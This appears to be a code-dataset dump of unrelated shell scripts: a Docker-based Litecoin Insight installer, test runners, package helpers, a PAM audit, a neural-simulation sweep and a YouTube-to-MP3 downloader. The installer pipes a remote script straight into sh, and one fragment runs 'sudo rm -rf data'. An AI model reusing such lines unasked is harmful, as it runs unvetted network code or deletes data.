test_run --debug --config data/kvm48-config.yml --mode perf --dry
# 2018-06-09 is a day with a short VOD: 其它/20180609 “砥砺前行” SNH48 GROUP 第五届偶像年度人气总决选启动仪式 第五届总选启动仪式.mp4
test_run --debug --config data/kvm48-config.yml --mode perf --from 2018-06-09 --to 2018-06-09
rm data/kvm48-config.yml
ls -lh data
sudo rm -rf data
| true |
cb64c50ac1f48858bfb13014491f7b70061d50c0 | Shell | Privex/ltcinsight-docker | /init.sh | UTF-8 | 10,794 | 3.703125 | 4 | [
"X11",
"MIT"
] | permissive | #!/usr/bin/env bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:${PATH}"
export PATH="${HOME}/.local/bin:/snap/bin:${PATH}"
cd "$DIR"
em() {
>&2 echo -e "$@"
}
hascmd() {
command -v "$@" &> /dev/null
}
has_cmd() { hascmd "$@"; }
autosudo() {
all_args=("$@")
first_el="${all_args[0]}"
last_els=("${all_args[@]:1:${#all_args[@]}}")
last_els_str="$(printf "%q " "${last_els[@]}")"
if (( EUID != 0 )); then
if hascmd sudo; then
sudo -- "$@"
_ret=$?
elif hascmd su; then
su -c "$first_el ${last_els_str}"
_ret=$?
else
em " [!!!] You're not root, and neither 'sudo' nor 'su' are available."
em " [!!!] Cannot run command: $first_el $last_els_str "
return 2
fi
else
env -- "$@"
_ret=$?
fi
return $_ret
}
: ${LTC_ENV="${DIR}/.env"}
: ${LTC_ENV_EXM="${DIR}/example.env"}
: ${LTC_COMPOSE="${DIR}/docker-compose.yml"}
: ${LTC_COMPOSE_EXM="${DIR}/bin.docker-compose.yml"}
: ${LTC_CADDY="${DIR}/caddy/Caddyfile"}
: ${LTC_CADDY_EXM="${DIR}/caddy/example.Caddyfile"}
: ${COMPOSE_VER="1.28.3"}
: ${COMPOSE_URL="https://github.com/docker/compose/releases/download/${COMPOSE_VER}/docker-compose-Linux-x86_64"}
if ! [[ -f "$LTC_ENV" ]]; then
em " [!!!] The env file '${LTC_ENV}' wasn't found. Copying example config '${LTC_ENV_EXM}'..."
>&2 cp -v "$LTC_ENV_EXM" "${LTC_ENV}"
fi
if ! [[ -f "$LTC_COMPOSE" ]]; then
em " [!!!] The docker compose file '${LTC_COMPOSE}' wasn't found. Copying binary image config '${LTC_COMPOSE_EXM}'..."
>&2 cp -v "$LTC_COMPOSE_EXM" "${LTC_COMPOSE}"
fi
if ! [[ -f "$LTC_CADDY" ]]; then
em " [!!!] The config file '${LTC_CADDY}' wasn't found. Copying example config '${LTC_CADDY_EXM}'..."
>&2 cp -v "$LTC_CADDY_EXM" "${LTC_CADDY}"
fi
source "${LTC_ENV}"
DST_TYPE="" PKG_MGR="" PKG_MGR_INS="" PKG_MGR_UP=""
hascmd apt-get && DST_TYPE="deb" PKG_MGR="apt-get"
[[ -z "$PKG_MGR" ]] && hascmd apt && DST_TYPE="deb" PKG_MGR="apt"
[[ -z "$PKG_MGR" ]] && hascmd dnf && DST_TYPE="rhel" PKG_MGR="dnf"
[[ -z "$PKG_MGR" ]] && hascmd yum && DST_TYPE="rhel" PKG_MGR="yum"
[[ -z "$PKG_MGR" ]] && hascmd pacman && DST_TYPE="arch" PKG_MGR="pacman"
[[ -z "$PKG_MGR" ]] && hascmd apk && DST_TYPE="alp" PKG_MGR="apk"
[[ -z "$PKG_MGR" ]] && hascmd brew && DST_TYPE="osx" PKG_MGR="brew"
if [[ -n "$PKG_MGR" ]]; then
if [[ "$DST_TYPE" == "deb" ]]; then
PKG_MGR_INS="${PKG_MGR} install -qy" PKG_MGR_UP="${PKG_MGR} update -qy"
elif [[ "$DST_TYPE" == "rhel" ]]; then
PKG_MGR_INS="${PKG_MGR} install -y" PKG_MGR_UP="${PKG_MGR} makecache -y"
elif [[ "$DST_TYPE" == "alp" ]]; then
PKG_MGR_INS="${PKG_MGR} add" PKG_MGR_UP="${PKG_MGR} update"
elif [[ "$DST_TYPE" == "arch" ]]; then
PKG_MGR_INS="${PKG_MGR} -S --noconfirm" PKG_MGR_UP="${PKG_MGR} -Sy --noconfirm"
elif [[ "$DST_TYPE" == "osx" ]]; then
PKG_MGR_INS="${PKG_MGR} install" PKG_MGR_UP="${PKG_MGR} update"
else
PKG_MGR=""
fi
fi
PM_UPDATED=0
_instpkg() {
if [[ -n "$PKG_MGR_UP" ]] && (( PM_UPDATED == 0 )); then
autosudo $PKG_MGR_UP
_ret=$?
if (( _ret )); then
em " [!!!] Non-zero return code from '$PKG_MGR_UP' - code: $_ret"
return $_ret
fi
em " +++ Successfully updated package manager '${PKG_MGR}'"
PM_UPDATED=1
fi
autosudo $PKG_MGR_INS "$@"
_ret=$?
if (( _ret )); then
em " [!!!] Non-zero return code from '$PKG_MGR_INS' - code: $_ret"
return $_ret
fi
em " +++ Successfully installed packages:" "$@"
return 0
}
instpkg() {
rets=0
for p in "$@"; do
_instpkg "$p"
_ret=$?
if (( _ret )); then
rets=$_ret
fi
done
return $rets
}
instpkg-all() {
_instpkg "$@"
}
autoinst() {
if hascmd "$1"; then
return 0
fi
em " [...] Program '$1' not found. Installing package(s):" "${@:2}"
instpkg "${@:2}"
}
autoinst git git
[[ "$(uname -s)" == "Linux" ]] && autoinst netstat net-tools
autoinst wget wget
autoinst curl curl
autoinst jq jq
[[ "$(uname -s)" == "Linux" ]] && autoinst iptables iptables || true
[[ "$DST_TYPE" == "arch" ]] && instpkg-all extra/fuse3 community/fuse-overlayfs bridge-utils
hascmd systemctl && autosudo systemctl daemon-reload
if ! hascmd docker; then
em " [!!!] Command 'docker' not available. Installing Docker from https://get.docker.com"
curl -fsS https://get.docker.com | sh
_ret=$?
if (( _ret )) || ! hascmd docker; then
em " [!!!] ERROR: Command 'docker' is still not available. Falling back to installing Docker via package manager (if possible)"
if autoinst docker docker.io; then
em " [+++] Successfully installed Docker via package 'docker.io'"
else
em " [!!!] ERROR: Failed to install package 'docker.io'. Possibly your system's repos list it under 'docker'..."
em " [!!!] Falling back to package name 'docker'..."
if autoinst docker docker; then
em " [+++] Successfully installed Docker via package 'docker'"
else
em " [!!!] CRITICAL ERROR !!!"
em " [!!!] We failed to install Docker via both Docker's auto-install script ( https://get.docker.com )"
em " [!!!] AND via your OS's package manager..."
em " [!!!] Please go to https://www.docker.com/get-started and lookup your operating system."
em " [!!!] You'll need to manually install Docker for your OS, and then re-run this script to try"
em " [!!!] setting up + installing + running Insight LTC via Docker for you."
em " NOTE: If you're not sure where this script is, it's located at: $0"
em " Full path: ${DIR}/$0"
em
exit 20
fi
fi
else
em " [+++] Successfully installed Docker via the official auto-installer script :)"
fi
fi
install() {
local is_verb=0
if [[ "$1" == "-v" || "$1" == "--verbose" ]]; then
is_verb=1
shift
fi
all_args=("$@")
first_els=("${all_args[@]::${#all_args[@]}-1}")
last_el="${all_args[-1]}"
autosudo cp -Rv "${first_els[@]}" "$last_el"
# If the last arg is a folder, then we need to get the file/folder names of
# the first arguments, then prepend them to the last argument (the dest. folder),
# so that we can chmod the files in the new location.
if [[ -d "$last_el" ]]; then
el_names=()
for f in "${first_els}"; do
el_names+=("${last_el%/}/$(basename "$f")")
done
autosudo chmod -Rv 755 "${el_names[@]}"
else
autosudo chmod -v 755 "$last_el"
fi
}
ins-compose() {
em " >>> Downloading docker-compose from URL: $COMPOSE_URL"
wget -O /tmp/docker-compose "$COMPOSE_URL"
em " >>> Attempting to install docker-compose into /usr/local/bin"
install /tmp/docker-compose /usr/local/bin/docker-compose
_ret=$?
[[ -f "/tmp/docker-compose" ]] && rm -f /tmp/docker-compose
return $_ret
}
if ! autoinst docker-compose docker-compose; then
em " >>> Detected error while installing docker-compose. Will attempt to install manually."
ins-compose
_ret=$?
if (( _ret == 0 )); then
em " [+++] Got successful return code (0) from ins-compose. Docker-compose should be installed."
else
em " [!!!] Got non-zero code from ins-compose (code: ${_ret}) - install may have errored..."
fi
fi
hascmd systemctl && autosudo systemctl daemon-reload
if [[ "$DST_TYPE" == "arch" ]]; then
em " >>> Arch Linux detected..."
em " >>> Stopping docker service..."
autosudo systemctl stop docker
em " >>> Waiting 10 seconds for Docker to fully shutdown and cleanup..."
sleep 10
em " >>> Reloading systemd"
autosudo systemctl daemon-reload
em " >>> Starting Docker service"
autosudo systemctl start docker
em " >>> Waiting 10 seconds for Docker to fully start up."
sleep 10
em " +++ Docker should now be ready."
em "\n\n"
em " # !!! !!! !!! !!!"
em " # !!! WARNING: On Arch Linux, Docker may not be able to automatically install and load the kernel"
em " # !!! modules that it requires to function after first being installed."
em " # !!!"
em " # !!! If you see a bunch of errors when this script tries to start the containers, then you likely"
em " # !!! need to upgrade your system (inc. kernel) using 'pacman -Syu' - and then reboot."
em " # !!!"
em " # !!! After rebooting, Docker's service should then be able to run just fine."
em " # !!! !!! !!! !!!\n\n"
sleep 5
fi
if hascmd systemctl; then
if autosudo systemctl status docker | head -n20 | grep -Eiq 'active:[ \t]+active( \(running\))?'; then
em " [+++] Service 'docker' appears to be active and running :)"
else
em " [!!!] Service 'docker doesn't appear to be running... Attempting to enable and start it..."
autosudo systemctl daemon-reload
autosudo systemctl enable docker
autosudo systemctl restart docker
em " [...] Waiting 5 seconds for docker service to start up..."
sleep 5
fi
elif hascmd service; then
em " [!!!] Warning: Your system doesn't have systemctl, but instead has 'service'. We may not be able to reliably check whether or not Docker is running."
em " [!!!] If you see errors while the script starts the Docker containers, check 'service docker status' to see if Docker is running."
em " [!!!] If the 'docker' service isn't running, try running 'service restart docker' and then run this script again."
em
if autosudo service docker status | grep -Eiq "active|running"; then
em " [+++] Service 'docker' appears to be active and running :) (fallback check via 'service' command)"
else
em " [!!!] Service 'docker doesn't appear to be running... Attempting to start it..."
autosudo service docker restart
em " [...] Waiting 5 seconds for docker service to start up..."
sleep 5
fi
else
em " [!!!] Warning: Your system doesn't have systemctl, nor 'service'. We cannot check whether or not Docker is running."
em " [!!!] If you see errors while the script starts the Docker containers, please ensure the 'docker' service is running,"
em " [!!!] using whatever service management tool your OS uses...\n"
fi
em " >>> Starting Insight Docker Containers using 'docker-compose up -d'"
autosudo docker-compose up -d
_ret=$?
exit $_ret
| true |
a93930e8d3f8d0b2e4c77b45b525669a17c266f5 | Shell | GLTSC/samaritan | /test/integration/proc/redis/run.sh | UTF-8 | 1,058 | 2.75 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash -eu
#
# Copyright 2019 Samaritan Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
readonly CUR_DIR=$(dirname "$0")
readonly DOCKER_REPO="samaritanproxy/sam-test"
readonly DOCKER_TAG="integration-$(basename $CUR_DIR)"
docker build -t "${DOCKER_REPO}:${DOCKER_TAG}" -f "${CUR_DIR}/Dockerfile" .
cmd="go test ${GOTEST_FLAGS:-""} ${CUR_DIR}"
docker run --rm \
-e GOPROXY="${GOPROXY:-}" \
-e GOFLAGS="${GOFLAGS:-}" \
"${DOCKER_REPO}:${DOCKER_TAG}" bash -c "$cmd"
| true |
5dc52c9303999e8afd86b5b49f9391e034f501e6 | Shell | sdothum/dotfiles | /bin/bin/functions/package/void/xb_check | UTF-8 | 656 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/dash
# sdothum - 2016 (c) wtfpl
# Package
# ══════════════════════════════════════════════════════════════════════════════
# ........................................................... Package management
usage() { usage: "$(basename $0) <package>*"; exit 1; }
[ $1 ] || usage
for i in $@ ;do xb Q $i >/dev/null || missing="$missing$i " ;done
# install missing packages
[ "$missing" ] && { ifno "install $missing" && exit 1; for i in $missing ;do xb S $i ;done }
# vim: set ft=sh: #
| true |
042f4ea28789fefc79e47f907de31c988105d59b | Shell | pablerass/dotfiles | /scripts/install-buttercup.sh | UTF-8 | 363 | 3.234375 | 3 | [] | no_license | #!/bin/bash -e
# Specify version
app=buttercup-desktop
ver=1.10.1
arch=amd64
package=${app}_${ver}_${arch}.deb
# Download deb packages
wget -N https://github.com/buttercup/buttercup-desktop/releases/download/v${ver}/${package}
# Install packages
sudo apt install gconf2 libappindicator1 libindicator7 -y
sudo dpkg -i $package
# Delete packages
rm -f $package
| true |
08f346677661d9174aad860013ceaf6f8755ff1d | Shell | NickSto/nstoler.com | /utils/psql-du.sh | UTF-8 | 1,393 | 4.15625 | 4 | [] | no_license | #!/usr/bin/env bash
if [ "x$BASH" = x ] || [ ! "$BASH_VERSINFO" ] || [ "$BASH_VERSINFO" -lt 4 ]; then
echo "Error: Must use bash version 4+." >&2
exit 1
fi
set -ue
Usage="Usage: \$ $(basename "$0") [-t] [-a]
Print the disk usage of each Postgres table.
-a: Include metadata tables (ones starting with \"django_\" and \"auth_\").
-t: Print as tab-delimited format, with 3 columns: timestamp, table name, and size in bytes."
function main {
# Get arguments.
all=
human="true"
while getopts ":ath" opt; do
case "$opt" in
a) all="true";;
t) human="";;
h) fail "$Usage";;
esac
done
pos1="${@:$OPTIND:1}"
pos2="${@:$OPTIND+1:1}"
now=$(date +%s)
if [[ "$human" ]]; then
format='pg_size_pretty('
format_end=')'
else
format=
format_end=
fi
echo "
SELECT relname AS \"relation\", ${format}pg_total_relation_size(C.oid)$format_end AS \"size\"
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname NOT IN ('pg_catalog', 'information_schema')
AND C.relkind <> 'i'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) DESC;" \
| psql -qtA -F $'\t' -d django \
| awk -F _ '"'"$all"'" || ($1 != "django" && $1 != "auth")' \
| awk '{if (!"'"$human"'") {printf("%d\t", '"$now"')} print $0}'
}
function fail {
echo "$@" >&2
exit 1
}
main "$@"
| true |
be3e33c922a11c6f0b31d09efd4a19358b95eeaf | Shell | antoniovizuete/git-ejercicios | /git-exercise-1/create.sh | UTF-8 | 152 | 2.625 | 3 | [] | no_license | #!/bin/bash
source ../_generic_create.sh
function _ex() {
echo "unu" > first.txt
echo "du" > second.txt
git add first.txt
}
_create _ex
| true |
50b1ac940c8553d32041ca5b2bfb98f9f686d71b | Shell | WilliamGrondin/TE-bot | /chromiummacro.sh | UTF-8 | 1,185 | 3.578125 | 4 | [] | no_license | #!/bin/bash
BASEDIR=$(dirname $0)
echo $BASEDIR
nbChromeUser=$1
echo "script nb-chrome-user"
#get links
wget --no-check-certificate -q https://raw.githubusercontent.com/WilliamGrondin/TE-bot/master/mylinks -O "$BASEDIR/links"
readarray -t links < "$BASEDIR/links"
linksLength=${#links[@]}
echo "Links : $linkLength"
for line in "${links[@]}";
do printf '%s\n' "$line";
done
#get country
readarray -t usersCountry < "$BASEDIR/countries"
#kill old process
killall -9 chromium-browser
killall -9 Xvfb
killall -9 sleep
sleep 2
#start virtual display
Xvfb :2 -screen 1 1024x768x16 -nolisten tcp & disown
sleep 2
#start chromium
rm -rf $BASEDIR/user*
for i in `seq 1 $nbChromeUser`
do
#recreate user dir
cp -r $BASEDIR/default-user $BASEDIR/user$i
echo "User$i country : ${usersCountry[$((i-1))]}"
sqlite3 $BASEDIR/user$i/Default/Local\ Storage/chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage "UPDATE ItemTable SET value=replace(value,'ca','${usersCountry[$((i-1))]}') WHERE key='be_rules';"
url="${links[RANDOM % linksLength]}"
echo "URL = $url"
chromium-browser --user-data-dir="$BASEDIR/user$i/" --display=:2.1 "$url" > /dev/null & disown
sleep 20
done
| true |
4320ba14236236a7ff9b6f7664f13a73572975bf | Shell | cloudtracer/lunar | /modules/audit_pam_wheel.sh | UTF-8 | 2,262 | 3.25 | 3 | [
"CC-BY-4.0"
] | permissive | # audit_pam_wheel
#
# PAM Wheel group membership. Make sure wheel group membership is required to su.
#
# Refer to Section(s) 6.5 Page(s) 142-3 CIS CentOS Linux 6 Benchmark v1.0.0
# Refer to Section(s) 6.5 Page(s) 165-6 CIS RHEL 5 Benchmark v2.1.0
# Refer to Section(s) 6.5 Page(s) 145-6 CIS RHEL 6 Benchmark v1.2.0
# Refer to Section(s) 5.6 Page(s) 257-8 CIS RHEL 7 Benchmark v2.1.0
# Refer to Section(s) 9.5 Page(s) 135-6 CIS SLES 11 Benchmark v1.0.0
# Refer to Section(s) 5.5 Page(s) 235-6 CIS Amazon Linux Benchmark v2.0.0
#.
audit_pam_wheel () {
if [ "$os_name" = "Linux" ]; then
funct_verbose_message "PAM SU Configuration"
check_file="/etc/pam.d/su"
search_string="use_uid"
if [ "$audit_mode" != 2 ]; then
echo "Checking: Wheel group membership required for su in $check_file"
total=`expr $total + 1`
check_value=`cat $check_file |grep '^auth' |grep '$search_string$' |awk '{print $8}'`
if [ "$check_value" != "$search_string" ]; then
if [ "$audit_mode" = "1" ]; then
insecure=`expr $insecure + 1`
echo "Warning: Wheel group membership not required for su in $check_file [$insecure Warnings]"
funct_verbose_message "" fix
funct_verbose_message "cp $check_file $temp_file" fix
funct_verbose_message "cat $temp_file |awk '( $1==\"#auth\" && $2==\"required\" && $3~\"pam_wheel.so\" ) { print \"auth\t\trequired\t\",$3,\"\tuse_uid\"; next }; { print }' > $check_file" fix
funct_verbose_message "rm $temp_file" fix
funct_verbose_message "" fix
fi
if [ "$audit_mode" = 0 ]; then
funct_backup_file $check_file
echo "Setting: Su to require wheel group membership in PAM in $check_file"
cp $check_file $temp_file
cat $temp_file |awk '( $1=="#auth" && $2=="required" && $3~"pam_wheel.so" ) { print "auth\t\trequired\t",$3,"\tuse_uid"; next }; { print }' > $check_file
rm $temp_file
fi
else
if [ "$audit_mode" = "1" ]; then
secure=`expr $secure + 1`
echo "Secure: Wheel group membership required for su in $check_file [$secure Passes]"
fi
fi
else
funct_restore_file $check_file $restore_dir
fi
fi
}
| true |
cdfd0caa6153c3071a12f23f3a201df10840567f | Shell | pragmagrid/lifemapper-compute | /src/futures/prepSrc.sh.in | UTF-8 | 389 | 3.203125 | 3 | [] | no_license | #!/bin/bash
# Purpose: Fetch futures source, backport of the concurrent.futures package from Python 3
DL_URL=https://files.pythonhosted.org/packages/47/04/5fc6c74ad114032cd2c544c575bffc17582295e9cd6a851d6026ab4b2c00
DL_PKG=@ARCHIVENAME@-@VERSION@.@TARBALL_POSTFIX@
get_source_files () {
echo "Fetch @ARCHIVENAME@ source code"
wget "$DL_URL/$DL_PKG"
}
### main ###
get_source_files
| true |
46eaa0cb309ef84105b6ea5ec7a3459d32c8279f | Shell | HEP-KBFI/stpol | /src/old_step3/resubmit_failed_task.sh | UTF-8 | 576 | 3.625 | 4 | [] | no_license | #!/bin/bash
#Resubmits the step3 job based on the failed slurm-JOBID.out file as the argument
if [ -z "$1" ]; then
echo "Usage: $0 /path/to/failed/slurm-12345.out"
echo "This script will look for the x* file in the slurm.out and resubmit the task based on the corresponding task_x*"
exit 1
fi
infile=`readlink -f $1`
TASKCODE=$(grep "Input file is" $infile | grep -oe "x[0-9]*")
JOBID=$(grep "SLURM job ID" $infile | grep -oe "=[0-9]*")
JOBID=${JOBID:1}
basedir=$(dirname $infile)
rm $basedir/*$JOBID*
SUBCMD=`cat $basedir/task_$TASKCODE`
cd $basedir
eval $SUBCMD
| true |
2b773eb6a446082aaa737183fbefe7c8664ae48a | Shell | alphagov/govuk-puppet | /modules/govuk/templates/usr/local/bin/es-rotate-passive-check.erb | UTF-8 | 931 | 3.828125 | 4 | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/bin/bash
# Redirect stdout and stderr to syslog
exec 1> >(/usr/bin/logger -s -t $(basename $0)) 2>&1
#FIXME: 2014-01-12 - Ideally this should be 21 days - need to fix logstasher gem first
ARGS='--delete-old --delete-maxage <%= @indices_days_to_keep %> --optimize-old --optimize-maxage 1 logs'
CMD="/usr/local/bin/es-rotate"
function send_to_monitoring() {
local MESSAGE=$1
local CODE=$2
printf "<%= @ipaddress_eth0 %>\tes-rotate\t${CODE}\t${MESSAGE}\n" | /usr/sbin/send_nsca -H <%= @alert_hostname %> >/dev/null
}
echo "Running es-rotate at `date`"
if [ -e "${CMD}" ]; then
${CMD} ${ARGS}
CODE=$?
if [ "${CODE}" -eq 0 ]; then
send_to_monitoring "es-rotate OK" 0
else
send_to_monitoring "es-rotate exited abnormally" 1
echo "es-rotate exited abnormally"
exit $CODE
fi
echo "Finished at `date`"
exit $CODE
else
send_to_monitoring "es-rotate: command '${CMD}' not found" 3
exit 1
fi
| true |
9fc50cb63d5518e9166d5549ca95190c79a006c3 | Shell | ameliegruel/VisualAttention_DVS | /Attention model with Matlab/HyperParametrage.sh | UTF-8 | 7,094 | 3.0625 | 3 | [] | no_license | #!/bin/bash
now=`date +"%F_%H-%M-%S"`
start=`date +"%s"`
mkdir Results/HyperSimu_$now
touch Results/HyperSimu_$now/Simulation_$now.csv
echo "Simulation;Video;Category;Sample;Bigger timestamp;" >> Results/HyperSimu_$now/Simulation_$now.csv
# parameters Attention
thresholdAttention=(25 50 100 108.1 110 125 150 200) #108.1
tmAttention=(0.2 2 5 10 15 20 50 100 150) #2
# parameters Inter
thresholdInter=(10 25 50 100 150 200 250 252.7 300) #article: 252.7 / code: 25
tmInter=(0.000025 0.00025 0.0025 0.025 0.25 2.5 10 25 50 100 150) #0.025
nbInterNeurons=(60 100 150 200) #60
# parameters Output
thresholdOutput=(5 10 14 15 20 25 30 50 100 140) #article: 140 / code: 25
tmOutput=(0.03 0.3 3 30 100 240 300 500) #240
nbOutputNeurons=(5 10 11 12 13 14 15 16 17 18 19 20 25 30)
# save parameters
touch Results/HyperSimu_$now/Parameters_Simu_$now.csv
# When accuracy run with Matlab script:
# echo "Simulation;Number of active output neurons;Activation rate of output layer;Rate coding;Rank order coding - Accuracy;Rank order coding - Specificity;threshold Attention;tm Attention;threshold Intermediate;tm Intermediate;neurons Intermediate;threshold Output;tm Output;neurons Output;" > Results/HyperSimu_$now/Parameters_Simu_$now.csv
# When accuracy run with Random Forest Classifier (Scikit-learn):
echo "Simulation;Rate coding;Rank order coding;Latency coding;threshold Attention;tm Attention;threshold Intermediate;tm Intermediate;neurons Intermediate;threshold Output;tm Output;neurons Output;" > Results/HyperSimu_$now/Parameters_Simu_$now.csv
# define matlab commands
import_data="gesturedata=importdata('data/gesture_data.csv');samplestime=importdata('data/samples_time.csv');save('data/gesture_data.mat','gesturedata','-v7.3');"
run_scripts="run('Attention_Neuron/runScriptDN.m');run('Intermediate_Layer/runScriptL1.m');run('Output_Layer/runScriptL2.m');"
run_accuracy="" # "run('compute_accuracy.m');"
exit="exit;"
# get categories
echo "Categories: $@" # use all parameters given as input, as categories to test
arg_cat=true
cats=""
arg_loop=false
loop=1
arg_simu=false
nbSimu=3
for arg in "$@"
do
if [[ "$arg" == "-l" ]]
then
arg_cat=false
arg_simu=false
arg_loop=true
elif [[ "$arg" == "-hp" ]]
then
arg_cat=false
arg_loop=false
arg_simu=true
elif [[ "$arg_cat" == true && $arg =~ ^[0-9]+$ ]]
then
cats=$cats$arg" "
elif [[ "$arg_loop" == true && $arg =~ ^[0-9]+$ ]]
then
loop=$arg
elif [[ "$arg_simu" == true && $arg =~ ^[0-9]+$ ]]
then
nbSimu=$arg
fi
done
echo "Categories:" $cats "over" $loop "loop(s)"
simu_parameters=""
categories=""
nbcat=0
for c in ${cats[@]}
do
nbcat=$((nbcat+1))
simu_parameters=$simu_parameters"SIMU.cat$nbcat=$c;"
l=0
while ((l < loop))
do
categories=$categories$c";"
l=$((l+1))
done
done
simu_parameters=$simu_parameters"SIMU.nb_categories=$nbcat;"
# get input data using tonic
start=`date +"%s"`
python3 getDVS128Gesture.py $@ | tee tmp.txt
fin=`date +"%s"`
cat tmp.txt | grep "^$\|Bigger\|Sample:\|//" | sed 's/^$/?/g' | sed "s/\/\//1/g" | grep -o '[0-9]*\|?' | tr '\n' ';' | sed "s/?;/\n/g" >> Results/HyperSimu_$now/Simulation_$now.csv
rm tmp.txt
#
s=1
# main loops
while ((s <= nbSimu))
do
echo "// SIMULATION LOOP $s //"
# save data
mkdir Results/HyperSimu_$now/HyperSimu$s
touch Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "Categories;;$categories" > Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "Sample times;"`cat data/samples_time.csv` >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "" >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
echo "timestamps;neuron tags" >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
# set random variables
# tmA=2
# thA=-25
# tmI=0.025
# thI=-25
# nbI=60
# tmO=240
# thO=-25
# nbO=5
tmA=${tmAttention[$RANDOM % ${#tmAttention[@]}]}
thA=${thresholdAttention[$RANDOM % ${#thresholdAttention[@]}]}
tmI=${tmInter[$RANDOM % ${#tmInter[@]}]}
thI=${thresholdInter[$RANDOM % ${#thresholdInter[@]}]}
nbI=${nbInterNeurons[$RANDOM % ${#nbInterNeurons[@]}]}
tmO=${tmOutput[$RANDOM % ${#tmOutput[@]}]}
thO=${thresholdOutput[$RANDOM % ${#thresholdOutput[@]}]}
nbO=${nbOutputNeurons[$RANDOM % ${#nbOutputNeurons[@]}]}
# define matlab commands
Attention_parameters="SIMU.DN_tm=$tmA;SIMU.DN_threshold=$thA;"
Intermediate_parameters="SIMU.L1_tm=$tmI;SIMU.L1_threshold=$thI;SIMU.L1_nNeurons=$nbI;"
Output_parameters="SIMU.L2_tm=$tmO;SIMU.L2_maxTh=$thO;SIMU.L2_nNeurons=$nbO;"
run_plots="addpath('./drawingUtils');run('plot_results.m');saveas(gcf,'Results/HyperSimu_$now/HyperSimu$s/Output_HyperSimu$s.png');saveas(gcf,'Results/HyperSimu_$now/HyperSimu$s/Output_HyperSimu$s.fig');close(gcf);"
# matlab
/usr/local/MATLAB/R2018a/bin/matlab -nosplash -nodesktop -r $import_data$simu_parameters$Attention_parameters$Intermediate_parameters$Output_parameters$run_scripts$run_plots$run_accuracy$exit | tee tmp.txt
# save results
sed -n '/OutputData/,/done/p' tmp.txt | grep '[0-9]' | sed 's/ */;/g' | sed 's/^;//g' >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
rm tmp.txt
# get accuracy and save parameters
python3 getAccuracy.py Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv | tee tmp.txt
# When accuracy run with Matlab script:
# nbActiveOutputNeurons=$(grep "activated Output" tmp.txt | grep -o "[0-9]*")
# rateActiveOutput=$(grep "Percentage of Output layer activation" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# rateCoding=$(grep "Accuracy - rate coding" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# rankOrderAccuracy=$(grep "Accuracy - rank order coding" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# rankOrderSpecificity=$(grep "Specificity - rank order coding" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# echo "$s;$nbActiveOutputNeurons;$rateActiveOutput;$rateCoding;$rankOrderAccuracy;$rankOrderSpecificity;$thA;$tmA;$thI;$tmI;$nbI;$thO;$tmO;$nbO;" >> Results/HyperSimu_$now/Parameters_Simu_$now.csv
# When accuracy run with Random Forest Classifier (Scikit-learn):
rateCodingAccuracy=$(grep "Rate" tmp.txt | grep -o "[0-9]\.[0-9]*")
rankOrderCodingAccuracy=$(grep "Rank" tmp.txt | grep -o "[0-9]\.[0-9]*")
latencyCodingAccuracy=$(grep "Latency" tmp.txt | grep -o "[0-9]\.[0-9]*")
echo "$s;$rateCodingAccuracy;$rankOrderCodingAccuracy;$latencyCodingAccuracy;$thresholdAttention;$tmAttention;$thresholdInter;$tmInter;$nbInterNeurons;$thresholdOutput;$tmOutput;$nbOutputNeurons;" >> Results/HyperSimu_$now/Parameters_Simu_$now.csv
rm tmp.txt
echo "Done for simulation loop $s"
echo ""
s=$((s+1))
done
end_sim=`date +"%s"`
echo "Récupération des données en" $(($fin-$start)) "secondes"
echo "Simulation complète en" $(($end_sim-$start)) "secondes" | true |
f4da88cb6a8cca43accd96e2c207721d06af1be3 | Shell | Ghostcode75/Bash-Tools | /TOYS/y2m.sh | UTF-8 | 6,277 | 3.890625 | 4 | [] | no_license | #!/usr/local/bin/bash
# Youtube to MP3 BASH script to steal shit...
CPR='Jd Daniel :: Gabelbombe'
MOD="$(date +'%Y-%m-%d @ %H:%M:%S')"
VER='7.1.5'
# REF : https://github.com/Gabelbombe/Bash-Tools/blob/master/TOYS/y2m.sh
# REQ : https://github.com/aadsm/JavaScript-ID3-Reader
## Buyers beware....
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
declare debug=''
declare title=''
declare isurl='http?(s)://*'
function print_usage()
{
echo -e '
Parameter usage: y2m [--help] [--title=<song-title>] [--video=<youtube-url>] [--cover=<cover-${save}>] [--save=<save-location>]
Parameters:
-t --title Title of the MP3 you want, should conform to `Art - Song Name`
-v --video Video URL to fetch from YouTube
-c --cover ${save} to attach to the MP3 [ Defaults to YouTube Promo ${save} ]
-d --save Directory save location [ Defaults to `~/Music` ]
-v --version Displays current version of y2m
Advanced Parameters:
--debug Appends `sketchy debugging` to the script, trust it like youd trust a white girl...
--update Force updates `youtube-dl`, if you err out, run this...
--flush Flushes `youtube-dl` caches
